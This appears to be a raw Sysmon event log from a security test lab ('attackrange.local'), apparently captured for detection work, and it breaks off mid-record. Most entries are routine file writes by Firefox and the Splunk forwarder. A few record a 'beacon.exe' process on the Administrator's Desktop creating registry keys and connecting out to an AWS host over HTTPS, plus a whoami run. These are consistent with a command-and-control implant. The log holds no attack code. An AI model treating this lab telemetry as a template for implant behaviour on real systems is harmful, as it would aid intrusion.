12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057348150Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=ECC5D73CA804DB94954EEBAC06D1598F,SHA256=FFC8B62BD8FD721514F1AE4C9DFB3FFCE7E42B3FD0B332B847D56F1764A360D9falsetrue 11241100x800000000000000057348149Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057348148Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=8444E20CC0E7A5BD29422FEC8629C6FE,SHA256=0E5825CA14A5643113BE662BB14C1CE2DCFCD461DF20DC8B8D923AD4CFFECEDAfalsetrue 11241100x800000000000000057348147Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057348146Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=D92A06D4F7631990A529C951A2EED43D,SHA256=8608210975291660A21433AFCE1680D86E9A0039CB7DAAB6D44FB6FFC616A7F9falsetrue 11241100x800000000000000057348145Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057348144Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=CA8263E0BA6646CE8EED2F03A9A0B6AF,SHA256=8C70883A353741DD703ED9448B20A014929A5199DCEAD6767B565FB4D2B1E1EDfalsetrue 11241100x800000000000000057348143Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057348142Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=7E41B26EE01D13CD5E061FE387593A5F,SHA256=9DEC83C2A4503D0EF2EA288DFAC3BC2CA79CE306F0E47501604D3B322A41F9CDfalsetrue 11241100x800000000000000057348141Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057348140Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=4588BE7E89CCE3633746A5B1AD30C538,SHA256=0FEF74B585AE52F16393C6BB2942CFF90505C3DB19C9C539929A8454D4F6543Dfalsetrue 11241100x800000000000000057348139Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057348138Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=5098B0CF4073580DB2849DEFC66E11EE,SHA256=762796082FA453FFE33140B6E16C831BC360D15D097C9DADD7CFF4E7968DF919falsetrue 11241100x800000000000000057348137Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057348136Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=47DAA904453320978689410F927C87F9,SHA256=672D18D4DA87FD885163C2C607336AD000586C22B76D8317F40BFF77FD1B868Dfalsetrue 11241100x800000000000000057348135Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.bin2021-09-22 02:41:24.950 23542300x800000000000000057348134Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:47.057{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\datareporting\glean\db\data.safe.binMD5=14155F7F5318D7B80414BC978504B2B6,SHA256=5FF9F7D958BD510BC98B4F7358D25AEC4BF65CE2E147621A9C946F832102348Ffalsetrue 12241200x800000000000000057348163Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:48.971{8B6011A9-E46E-6165-1E2A-00000000F101}4584C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348162Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:48.955{8B6011A9-E46E-6165-1E2A-00000000F101}4584C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 11241100x800000000000000057348161Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:48.656{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057348160Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:48.656{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=547E05D097B86CFE682D3BB0072C5B98,SHA256=20F8E71666FD1E8996AAAE2D8596532F11E4E1B351FB92DF9385EB539109C246falsetrue 11241100x800000000000000057348159Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:48.637{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057348158Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:48.637{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40B5655343B3A01D3E1CCCB083F991FD,SHA256=670B4C55F72E12A440B1B884E6E0C679C45E274386B713A4A80ED5BEB88E1AC3falsetrue 23542300x800000000000000021219862Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:48.345{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB007F848F1E1984563529DF4C46DA4E,SHA256=D61D7C11334E32AAE2A2F5D2D702BBF5984D9B7748EE6A10533F386C1C84418E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057348167Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:49.970{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057348166Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:49.970{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4082110960142947DFFC9BD6187F2532,SHA256=3979BB8333F15C4F2B06287FAD713B80A4D0871ECCFF9420737141593508F2C4falsetrue 11241100x800000000000000057348165Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:49.670{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057348164Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:49.670{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DD15BAF0B739F2FB8A78C953F297DD2,SHA256=D22FD1B4083093A4B99D4EFE35DD66CF691E65475129D31D18B1FFB6DE4C1CFDfalsetrue 23542300x800000000000000021219863Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:49.345{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1043F4A7F25F284FA24EBE6624C2960A,SHA256=7BAE7927A124D2A0F70253FD6FBA9A16128E303694EB222B696E61EFD8F5EA35,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219866Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:50.470{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6EAAB3C253C70C3724243A2685110B81,SHA256=12CE92A7F245342D428E0542B9FB06807A2B058015F2CD821F7373E4B27E2C13,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219865Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:50.470{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=01B23BCE60EAF73C3BD1B3E1E64EF879,SHA256=5F172D559034B22C25F78EE26C77125F064ACFC98487E48953A4A751B54B52E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219864Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:50.345{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14BE253B8BB143EDF223512870936B0C,SHA256=4C54689BC041081B9AA6C774A6EDBEE0269A8B6FEE44706C47D222695FAAA241,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057348242Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.985{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057348241Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.985{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=00F4717364B4FEABA1E733B9DCD9963A,SHA256=64FA65C91A9303C9E587073769D8BF50808EB423016494FE3E4120C88CB09C80falsetrue 354300x800000000000000057348240Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:21.327{8B6011A9-E46E-6165-1E2A-00000000F101}4584C:\Users\Administrator\Desktop\beacon.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local54568-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 354300x800000000000000057348239Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:21.309{8B6011A9-887D-6164-2D00-00000000F101}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local49795- 11241100x800000000000000057348238Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.884{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057348237Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.884{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1FF9D5BD0ACD02C09DF203AEE1535E32,SHA256=B01BE08A603A29A422502D0A2D2DC8FBF3B1C306908003898EF1883A33064D68falsetrue 11241100x800000000000000057348236Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.769{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057348235Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.769{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C2DBD999641AAA797D6FC1654237E423,SHA256=CCFA74F0EBA7B343A6FDDB8487B009AB994E077BDC1819E1A0D6ED0B9EC7AB70falsetrue 11241100x800000000000000057348234Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.754{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057348233Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.754{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=155B521CB18AD79B34049D3715B864BA,SHA256=F71AF6B6C49A10455E8C4A3B89A79C3C612AE62D040B01534FEF2D29A7B4486Cfalsetrue 11241100x800000000000000057348232Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.737{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 11241100x800000000000000057348231Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.737{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057348230Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.737{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=104B7FFB3776F32DC68444CC9FBA8F8E,SHA256=5EBD90407440691DAAC71E0FDEC67D7619CA9557343017009F1B009A9E360846falsetrue 23542300x800000000000000057348229Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.737{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=789F5F996A5B24E9F67F068E49897158,SHA256=B9030330C7B258F5C9B923DE1C067AB8728BFF0AB32E0A1D070225CBF4A54056falsetrue 11241100x800000000000000057348228Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.669{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057348227Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.669{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4DCAA7147169578B489199740B3D7B53,SHA256=818386AF56CD9D5B8F749FC84BBB20CC23B4B78223AC84B37E53C3EC5B16A703falsetrue 11241100x800000000000000057348226Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.669{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057348225Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.669{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1C4FE722EDB3A10790221814C401CCFA,SHA256=E396E5C3543431364BC17397A16CDDD3C9961C9D1DD5DF94F9CA01E6C0ABCBCCfalsetrue 534500x800000000000000057348224Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.585{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exe 734700x800000000000000057348223Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057348222Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057348221Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057348220Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057348219Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000057348218Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057348217Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\authz.dll10.0.14393.1737 (rs1_release_inmarket.170914-1249)Authorization FrameworkMicrosoft® Windows® Operating SystemMicrosoft Corporationauthz.dllMD5=6BAADF6A3E985DE5AB6FDA778E18F1A5,SHA256=8FD060B0F29A1FB23C3D1F389C22EC067247F1E457F331D2B15AE44323ECB8D0trueMicrosoft WindowsValid 734700x800000000000000057348216Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057348215Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057348214Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.569{8B6011A9-5BAA-618E-55F3-04000000F101}352C:\Windows\System32\whoami.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft 